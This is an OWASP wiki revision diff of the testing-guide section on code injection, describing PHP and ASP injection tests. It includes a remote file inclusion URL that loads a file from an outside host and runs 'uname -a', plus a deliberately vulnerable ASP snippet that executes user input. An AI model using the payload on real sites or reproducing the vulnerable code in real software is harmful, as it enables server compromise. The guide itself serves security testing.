Difference between revisions of "Testing for Code Injection (OTG-INPVAL-012)"

From OWASP
Jump to: navigation, search
 
Line 1: Line 1:
{{Template:OWASP Testing Guide v2}}
+
== Brief Summary ==
 +
 +
This section describes how an attacker can enter code as input on a web page and have it executed by the web server.
  
== Short Description of the Issue (Topic and Explanation) ==  
+
== Description of the Issue ==
...<br>
+
 +
Code Injection attacks involve an attacker submitting code as input that is processed by the web server as dynamic code or as in an included file. These attacks can target various server side scripting engines, i.e. ASP, PHP, etc.  Proper validation and secure coding practices need to be employed to protect against these attacks.
  
 
== Black Box testing and example ==
 
== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' <br>
+
...<br>
+
'''Testing for PHP Injection vulnerabilities:'''
'''Result Expected:'''<br>
+
 
...<br><br>
+
Using the querystring, the tester can inject code (in this example, a malicious url) to be processed as part of the included file:
== Gray Box testing and example ==  
+
 
'''Testing for Topic X vulnerabilities:'''<br>
+
http://uptime.alertra.com/uptime.php?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a
...<br>
+
 
'''Result Expected:'''<br>
+
 
...<br><br>
+
'''Result Expected:'''
 +
 
 +
The malicious url is accepted as a parameter for the PHP page, which will later use the value in an include file.
 +
 
 +
 
 +
== Gray Box testing and example ==
 +
 
 +
'''Testing for ASP Code Injection vulnerabilities
 +
 
 +
Examining ASP code for user input used in execution functions, e.g. Can the user enter commands into the Data input field?  Here, the ASP code will save it to file and then execute it:
 +
 
 +
(((<%
 +
If not isEmpty(Request( "Data" ) ) Then
 +
Dim fso, f
 +
Set fso = CreateObject("Scripting.FileSystemObject")
 +
Set f = fso.OpenTextFile(Server.MapPath( "data.txt" ), 8, True)
 +
f.Write Request("Data") & vbCrLf
 +
f.close
 +
Set f = nothing
 +
Set fso = Nothing
 +
 
 +
Server.Execute( "data.txt" )
 +
 
 +
Else
 +
%>
 +
<form>
 +
<input name="Data" /><input type="submit" name="Enter Data" />
 +
</form>
 +
<%
 +
End If
 +
%>)))
 +
 
 +
 
 
== References ==
 
== References ==
'''Whitepapers'''<br>
 
...<br>
 
'''Tools'''<br>
 
...<br>
 
{{Category:OWASP Testing Project AoC}}
 
[[OWASP Testing Guide v2 Table of Contents]]
 
  
{{Template:Stub}}
+
Security Focus
 +
 
 +
Insecure.org
 +
 
 +
Wikipedia

Revision as of 21:33, 6 November 2006

Brief Summary

This section describes how an attacker can enter code as input on a web page and have it executed by the web server.

Description of the Issue

Code Injection attacks involve an attacker submitting code as input that is processed by the web server as dynamic code or as in an included file. These attacks can target various server side scripting engines, i.e. ASP, PHP, etc. Proper validation and secure coding practices need to be employed to protect against these attacks.

Black Box testing and example

Testing for PHP Injection vulnerabilities:

Using the querystring, the tester can inject code (in this example, a malicious url) to be processed as part of the included file:

http://uptime.alertra.com/uptime.php?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a


Result Expected:

The malicious url is accepted as a parameter for the PHP page, which will later use the value in an include file.


Gray Box testing and example

Testing for ASP Code Injection vulnerabilities

Examining ASP code for user input used in execution functions, e.g. Can the user enter commands into the Data input field? Here, the ASP code will save it to file and then execute it:

(((<% If not isEmpty(Request( "Data" ) ) Then Dim fso, f Set fso = CreateObject("Scripting.FileSystemObject") Set f = fso.OpenTextFile(Server.MapPath( "data.txt" ), 8, True) f.Write Request("Data") & vbCrLf f.close Set f = nothing Set fso = Nothing

Server.Execute( "data.txt" )

Else %> <form> <input name="Data" /><input type="submit" name="Enter Data" /> </form> <% End If %>)))


References

Security Focus

Insecure.org

Wikipedia